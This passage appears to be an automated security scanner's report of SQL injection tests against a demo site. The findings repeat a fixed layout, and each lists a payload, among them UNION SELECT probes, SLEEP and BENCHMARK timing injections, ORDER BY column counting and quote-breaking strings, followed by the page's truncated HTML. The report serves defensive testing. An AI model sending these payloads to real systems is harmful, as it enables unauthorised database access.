src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1184\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1185Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1186\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1187\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 23\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1188\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName ValueDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1189\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or sleep(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1190\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1191\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1192\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1193\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1194\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1195\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1196\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or \"\"^\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1197\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# \" or benchmark(10000000,MD5(1))\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 